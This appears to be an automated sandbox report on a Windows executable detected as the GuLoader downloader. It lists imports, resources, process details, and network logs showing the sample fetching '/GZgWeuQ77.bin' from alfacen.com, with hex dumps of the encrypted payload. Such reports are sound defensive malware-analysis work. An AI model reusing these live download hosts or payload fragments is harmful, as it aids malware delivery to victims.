RT_ICON | 0x9a378 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.46473029045643155
RT_ICON | 0x9c920 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.550187617260788
RT_ICON | 0x9d9c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.4095744680851064
RT_DIALOG | 0x9de30 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x9df78 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0x9e0b8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x9e1b8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x9e2d8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x9e3a0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x9e400 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0x9e478 | 0x14c | Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970 | English | United States | 0.5813253012048193
RT_MANIFEST | 0x9e5c8 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 19:09:27.812395096 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:27.812450886 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:27.812555075 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:27.827723026 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:27.827749014 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:29.429107904 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:29.429223061 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:29.509888887 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:29.509919882 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:29.510845900 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:29.511445045 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:29.641005993 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:29.683448076 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.143138885 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.143157959 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.143232107 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.143256903 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.143270016 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.143296957 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.299513102 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.299587965 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.457535982 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.457604885 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.457840919 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.457890987 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.617942095 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.618024111 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.784518957 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.784646988 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.828896999 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.829080105 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.928620100 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.928734064 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:30.985232115 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:30.985322952 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:31.928946972 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:31.928961992 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:31.929054976 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:31.930002928 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:31.930073023 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.086008072 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.086107969 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.241575956 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.241678953 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.242474079 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.242539883 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.398699045 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.398792982 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.400091887 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.400146008 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.400190115 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.557626963 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.557749033 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.558819056 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.558900118 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.559295893 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.559367895 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.714088917 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.714163065 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.714884996 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.714943886 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.715958118 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.716022968 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.872096062 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.872194052 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.873126030 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.873187065 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:32.873677015 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:32.873738050 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.029438019 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.029529095 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.030471087 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.030540943 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.030767918 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.030834913 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.031735897 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.031791925 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.187561035 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.187761068 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.188127041 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.188189983 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.188612938 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.188678026 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.189570904 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.189630985 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.344813108 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.344996929 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.345324039 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.345391035 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.346215010 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.346280098 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.346290112 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.346333027 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.346364975 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.346412897 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.380670071 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.380718946 CEST | 443 | 49846 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 19:09:33.380733013 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 19:09:33.380772114 CEST | 49846 | 443 | 192.168.2.4 | 193.107.36.30
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 19:09:27.727332115 CEST | 63721 | 53 | 192.168.2.4 | 1.1.1.1
Oct 20, 2024 19:09:27.804600954 CEST | 53 | 63721 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 20, 2024 19:09:27.727332115 CEST | 192.168.2.4 | 1.1.1.1 | 0xc960 | Standard query (0) | alfacen.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 20, 2024 19:09:27.804600954 CEST | 1.1.1.1 | 192.168.2.4 | 0xc960 | No error (0) | alfacen.com | | 193.107.36.30 | A (IP address) | IN (0x0001) | false
                                                        • alfacen.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49846 | 193.107.36.30 | 443 | 1060 | C:\Users\user\Desktop\450707124374000811.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-20 17:09:29 UTC | 161 | OUT | GET /GZgWeuQ77.bin HTTP/1.1
User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: alfacen.com
Cache-Control: no-cache
2024-10-20 17:09:30 UTC | 344 | IN | HTTP/1.1 200 OK
Date: Sun, 20 Oct 2024 17:09:29 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Fri, 18 Oct 2024 09:43:46 GMT
Accept-Ranges: bytes
Content-Length: 287296
Cache-Control: max-age=2592000
Expires: Tue, 19 Nov 2024 17:09:29 GMT
Vary: Accept-Encoding
Content-Type: application/octet-stream
                                                        2024-10-20 17:09:30 UTC7848INData Raw: cf c5 f8 ac f6 67 ef 06 07 f8 37 69 71 e5 d0 63 6e a7 11 60 13 f7 7c 32 98 d3 07 17 1b 04 21 a6 fc 61 21 db 82 0c 0c ba 46 57 13 cc dd 2f ce bd 43 43 ef 35 7d c0 fc 24 73 28 81 73 c3 a6 69 98 93 d8 f3 4e 6a c2 71 51 f0 c6 fc 07 f8 50 07 e1 0b f0 b4 20 98 33 d0 3c 0c 3c f2 a4 e0 52 c3 85 c1 ae f3 a8 58 8c e1 13 e9 10 56 32 c1 ed e1 41 3e 19 b6 c3 22 30 78 90 98 2a 46 7c d9 95 0d 4f 3b 89 7f d3 95 f3 70 38 31 fd 3c e2 2b b2 8e bc 0f f7 d6 61 4a 63 12 42 09 e3 2c 28 3e 2a 77 4f 82 c5 9d 08 51 bc d0 b0 72 ed cf 50 f3 4a 6b 0c 78 44 57 39 ba 8a 63 81 20 63 93 0c 8e af 85 cf c2 c3 fc a9 90 62 3a b3 59 2d 6c bb ab fb 54 6e f1 22 30 66 97 3e 79 56 a5 5d 1f 0f e0 07 14 f9 2b e4 82 f2 c7 a6 e9 67 80 9f d7 69 d9 c4 b0 37 47 52 0a c3 02 fa 36 c0 87 ea 25 2d 64 c9 a9
                                                        Data Ascii: g7iqcn`|2!a!FW/CC5}$s(siNjqQP 3<<RXV2A>"0x*F|O;p81<+aJcB,(>*wOQrPJkxDW9c cb:Y-lTn"0f>yV]+gi7GR6%-d
                                                        2024-10-20 17:09:30 UTC8000INData Raw: 2c ce e6 06 e5 82 20 0b 06 93 db cf 18 ec ae 54 43 ca 88 70 a9 e1 bd 58 e5 d6 65 bc 1a f3 16 f4 b1 18 b0 5e 0f 1e 81 12 d3 d6 45 64 95 b8 78 50 9a 84 4f ec 12 72 a7 b8 d9 43 9f 7d ed 3b 31 2d 84 94 cc d8 0f 9e 75 cc 7f 6e 99 13 d4 61 ab bf 51 51 00 90 3a 67 14 91 53 3f 30 ea 39 c1 5d 2e 99 e4 39 e9 f7 78 f3 82 4d ab bc d6 a3 0e cf 16 47 02 d9 a8 f3 b5 78 d7 5e 01 b1 6f 57 26 fe 1d 62 73 ed e4 cf 08 b8 72 39 4b 3f 68 9b f2 a4 8d c3 06 d5 95 39 23 02 ec cb c9 d4 84 3a af d1 04 ef a8 c4 c1 33 31 de c6 cb cb 34 6a 55 a7 4b 28 44 90 05 6c fe 05 65 ea 02 76 3f 23 6e 9b c6 46 36 75 8f b2 9d 7c 80 68 d4 91 08 59 44 65 88 d5 29 b6 64 6c bc eb f9 a1 a0 0d 6c e7 14 30 9e 46 02 b8 3d 38 e9 f5 f9 d8 86 c7 b7 9c 52 ab fc de bb 45 d8 e8 a4 d8 c5 ec 5f ac 38 a6 7b c8 b9
                                                        Data Ascii: , TCpXe^EdxPOrC};1-unaQQ:gS?09].9xMGx^oW&bsr9K?h9#:314jUK(Dlev?#nF6u|hYDe)dll0F=8RE_8{
                                                        2024-10-20 17:09:30 UTC8000INData Raw: f2 ae 50 c3 29 22 6c ae a8 6f 37 25 0d 97 21 ca be 06 82 75 8d 66 e2 1a 63 c8 9c 4b 53 cb 8a 10 07 98 93 a6 25 11 92 cf 18 3b c1 7e f3 b1 cd a0 68 80 66 4d 7b 18 3e 3f fc f1 c2 4f 9d f4 7c 7c e4 ac c7 a6 87 2d 89 32 c3 a3 e7 7b 2a 63 aa 92 54 f4 ee 25 ef bd b7 8b 93 0a f1 1a a7 7f 35 dd af 3e 49 88 c1 61 01 15 5c 7a 2a c1 b5 23 87 a9 f8 24 fc d0 fb 6f f9 7d 64 92 47 b4 5d 2f 0d 8c e6 ef 97 04 51 96 a1 7b 61 65 8a 0e 0e 37 b4 31 05 39 ce 21 a1 3b be df ee de e0 5d 9d a4 85 cd 7e 9d c3 41 64 89 9e f9 8e 86 1c 07 59 5e fc 16 87 4e 73 56 a9 45 21 e8 2e d7 d6 0d 45 bb 11 5c c1 bc 29 1b fb d3 72 49 bf 9d 6a f2 bf 3b 17 b3 ec 53 d2 be 1b fa 46 79 5c db 4a d9 88 e2 0f c0 4d bf f0 44 37 41 e0 0c fd 9b 00 c1 a9 f3 a7 ce 23 50 84 f3 01 0f 19 fd e3 59 1b c9 9a 3c 2e
                                                        Data Ascii: P)"lo7%!ufcKS%;~hfM{>?O||-2{*cT%5>Ia\z*#$o}dG]/Q{ae719!;]~AdY^NsVE!.E\)rIj;SFy\JMD7A#PY<.
                                                        2024-10-20 17:09:30 UTC8000INData Raw: be 2e 90 bd 4d eb 72 de b5 1f ad 1b 04 2a 4f 2a ff 04 2b 12 c9 51 c6 db d3 49 dd 45 c9 ef d4 d9 ff ba b4 72 7e c6 23 82 1d 92 0c 69 c5 d0 b3 78 98 45 59 bc 94 20 07 9d 45 6c db 31 0a 84 e4 52 ed 6d 61 ec 6a 79 94 94 13 73 cd 49 e5 92 34 27 c4 0a b7 a7 85 00 5d d5 b0 11 8b bb 43 e1 45 7f 4c 91 d5 39 8f 83 a2 df 3c 42 c6 83 80 6c bc 94 41 36 d0 3a fa d9 a9 ab 64 2f 90 f9 7d a2 bb 12 10 d6 9e 20 d4 92 00 b4 98 d9 5c 11 44 bd d7 10 3d 3a 46 e2 bc dc 2c 14 72 6a b7 69 65 db 21 79 e6 82 72 d1 3d e2 01 aa 75 15 9d 72 90 7b a2 68 56 40 ea 3b 26 1f 6e 6c 67 7c ae 32 d8 17 c3 e0 cc 06 06 ba 90 7a e3 98 47 44 05 c0 3f 49 3b 00 e6 f1 2b a4 29 3b dc c5 a6 6c f6 31 f2 a7 f0 94 76 b4 89 5d c9 02 0b 85 7e 30 b9 ad ad a1 26 68 1f 7a f5 72 33 cc 39 01 e1 a2 02 d8 31 72 da
                                                        Data Ascii: .Mr*O*+QIEr~#ixEY El1RmajysI4']CEL9<BlA6:d/} \D=:F,rjie!yr=ur{hV@;&nlg|2zGD?I;+);l1v]~0&hzr391r
                                                        2024-10-20 17:09:30 UTC8000INData Raw: 0a 80 72 67 3f 68 36 16 a7 4c c3 2f 6d e8 4c d4 20 df 61 28 af ab 85 7c 0f 45 30 70 7d f5 d8 d6 2b f7 f2 c7 f9 c0 4b d5 e1 ba 76 ea 7e 00 1b 5c 94 9d fe 8b 99 74 62 17 c2 68 aa 4c 0b a4 37 ac 2d 17 63 43 8c 6d 85 82 79 aa 49 84 2a 62 2e 1e bc 77 27 5c d8 ee 9a 3d 9e be f0 55 b1 bc de 25 04 a6 fe 3e 62 c9 70 21 be b6 a2 f8 ed 99 63 81 2b d0 7e ed 61 fe 0c 9f b0 23 a2 06 92 3f 7f 06 90 6c 3b 38 43 e3 97 96 a8 0f 92 e5 5b b3 cc 06 6b 68 37 17 53 0c 1b ef 2e ba c7 dc e6 90 c7 0b fc 34 b2 7e bf bd 7c 7e f8 ce b7 e9 ac c4 57 e5 d0 cb 1d a2 55 c6 0c ee a1 04 2c 14 cc 9b 10 c5 cc 94 bf 4c 6e 6b cf b0 64 6c 60 53 f7 ae 51 c8 80 c2 a7 76 db 03 8b ff fe 1b 0e a5 a0 0b 37 72 aa 83 cc 02 e0 0c d0 59 16 21 ff 6a 73 a4 bc 97 3a 77 53 eb 2f 51 0b 6a a1 fe 44 99 c7 72 8f
                                                        Data Ascii: rg?h6L/mL a(|E0p}+Kv~\tbhL7-cCmyI*b.w'\=U%>bp!c+~a#?l;8C[kh7S.4~|~WU,Lnkdl`SQv7rY!js:wS/QjDr
                                                        2024-10-20 17:09:30 UTC8000INData Raw: f6 eb eb 54 c2 dd 5d ad c6 8a 8d 4d a2 88 8a db 68 2b 3a 35 24 86 28 8e f8 cb b4 3d 77 ef 6f f0 8d cd 43 a6 19 bb ce 67 ad c6 e4 f7 c0 be 27 89 15 0c 6e eb 30 ba b2 18 8a d0 e8 05 ac 7e aa 93 93 5e df 2c 66 0c 4a f6 39 c3 02 a0 b9 86 4f 66 47 3f 13 45 da a8 78 6c d1 82 56 8a fc 70 e6 58 74 30 d2 56 17 24 8d bd 00 a1 62 33 82 84 7e 92 ad 25 77 00 b0 89 d4 1b dc 75 1f 13 75 c1 32 e6 88 0d 5d 96 23 61 08 71 b4 98 b9 7b d0 d4 d8 21 b6 21 3e 6b 32 c2 08 ee 28 cb 08 74 b3 f6 9e 54 ad 5b 1e 00 31 0e 26 4f dd 06 22 f3 4a a7 84 64 a1 46 15 35 45 02 89 6b 22 58 ad 13 5a 51 4d ca 86 12 09 db 77 f1 04 fe 32 76 49 cd cf 79 76 4d cd 6f c9 c8 31 76 92 c1 49 32 4d 05 b9 26 55 83 70 e7 bc e7 75 33 53 a1 da d8 03 a1 31 57 c8 3c 28 23 62 75 22 90 a0 61 f8 13 29 09 ae b8 8b
                                                        Data Ascii: T]Mh+:5$(=woCg'n0~^,fJ9OfG?ExlVpXt0V$b3~%wuu2]#aq{!!>k2(tT[1&O"JdF5Ek"XZQMw2vIyvMo1vI2M&Upu3S1W<(#bu"a)
                                                        2024-10-20 17:09:30 UTC8000INData Raw: 8d 1b 25 c3 75 d9 7d a0 e8 73 64 cc d7 33 b7 9c 88 90 32 d3 4b 6b 81 9b 73 08 d7 92 1d b8 b2 09 54 fa 3c c4 aa bb f3 cf d4 16 b4 70 61 0e 2e df 2a d4 b6 1b 2b 3e d3 0b 77 69 17 2d 79 20 22 b2 77 23 c4 d3 8f 6a 9b 63 ce c3 a3 de 1a 5a 93 4c 6a 3b 01 14 98 e3 fa 38 e2 cc 53 dc 83 94 24 0f d8 5c 85 f3 73 6b ec ca bb 03 61 ce 77 f6 9b f0 d9 02 61 aa e1 bd 1d 82 9b 28 a5 5c 98 2d a7 c6 e4 ed 2b f2 8d 5d 22 0b 0d d9 b4 f8 26 99 0e bc 13 d6 51 f4 4f f8 4c e5 ca 23 54 a1 f7 57 a7 7d da d8 a3 fb 60 cf 1b 27 ab 0b a9 f9 69 1e 77 20 04 d5 21 93 42 18 1e fc 78 f4 eb 98 30 3e 1e 99 b8 9b 3c ea 6d 0c b2 d9 80 38 04 91 1f 80 2f 3b 5c 2e 23 ba cf b9 ff eb 5d 11 fb c1 30 fb db ec cd b5 12 51 b5 0a 43 9a 69 1f 5e a8 30 ec b2 04 c4 55 f7 7a 14 39 0f eb 7f bc 75 fe ed 94 cc
                                                        Target ID:0
                                                        Start time:13:08:01
                                                        Start date:20/10/2024
                                                        Path:C:\Users\user\Desktop\450707124374000811.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\450707124374000811.exe"
                                                        Imagebase:0x400000
                                                        File size:1'001'467 bytes
                                                        MD5 hash:22AEAB62009AAA9073B3159D7DA1195E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2468313249.0000000002BF8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:13:09:18
                                                        Start date:20/10/2024
                                                        Path:C:\Users\user\Desktop\450707124374000811.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\450707124374000811.exe"
                                                        Imagebase:0x400000
                                                        File size:1'001'467 bytes
                                                        MD5 hash:22AEAB62009AAA9073B3159D7DA1195E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                          Execution Graph

                                                          Execution Coverage:22.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:19.6%
                                                          Total number of Nodes:1542
                                                          Total number of Limit Nodes:46
3864->3849 3872 406523 3865->3872 3866 406599 3867 40659e CharPrevW 3866->3867 3869 4065bf 3866->3869 3867->3866 3868 40658c CharNextW 3868->3866 3868->3872 3869->3826 3871 406578 CharNextW 3871->3872 3872->3866 3872->3868 3872->3871 3873 406587 CharNextW 3872->3873 3886 405b80 3872->3886 3873->3868 3882 4060ef 3874->3882 3877 406184 RegQueryValueExW RegCloseKey 3878 4061b4 3877->3878 3878->3849 3879->3849 3880->3849 3881->3851 3883 4060fe 3882->3883 3884 406102 3883->3884 3885 406107 RegOpenKeyExW 3883->3885 3884->3877 3884->3878 3885->3884 3887 405b86 3886->3887 3888 405b9c 3887->3888 3889 405b8d CharNextW 3887->3889 3888->3872 3889->3887 3891 4066b5 PeekMessageW 3890->3891 3892 4066c5 WaitForSingleObject 3891->3892 3893 4066ab DispatchMessageW 3891->3893 3892->3843 3893->3891 5251 401000 5252 401037 BeginPaint GetClientRect 5251->5252 5253 40100c DefWindowProcW 5251->5253 5255 4010f3 5252->5255 5258 401179 5253->5258 5256 401073 CreateBrushIndirect FillRect DeleteObject 5255->5256 5257 4010fc 5255->5257 5256->5255 5259 401102 CreateFontIndirectW 5257->5259 5260 401167 EndPaint 5257->5260 5259->5260 5261 401112 6 API calls 5259->5261 5260->5258 5261->5260 4178 100027c2 4179 10002812 4178->4179 4180 100027d2 VirtualProtect 4178->4180 4180->4179 5262 401503 5263 40150b 5262->5263 5265 40151e 5262->5265 5264 402c15 17 API calls 5263->5264 5264->5265 4216 402306 4217 40230e 4216->4217 4220 402314 4216->4220 4218 402c37 17 API calls 4217->4218 4218->4220 